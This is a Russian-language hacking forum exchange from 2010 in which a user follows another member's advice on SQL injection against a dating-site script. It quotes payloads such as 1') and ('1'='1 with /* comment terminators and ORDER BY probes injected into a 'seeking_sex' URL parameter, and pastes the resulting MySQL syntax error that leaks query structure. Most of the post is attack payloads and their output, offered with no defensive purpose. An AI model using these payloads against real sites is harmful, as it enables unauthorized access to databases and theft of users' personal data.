18.10.2010, 00:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Strilo4ka
Многострочный запроc, а вы режете
--
, используйте
/*
.
Если не прокатит
/*
, то в уязвимый параметр
1') and ('1'='1
.
Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
спс
пробовал так:
http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*
без ошибок но и без профилей
а так:
http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13
http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*
без ошибок но и без профилей
что то не получится чтол
|
|
|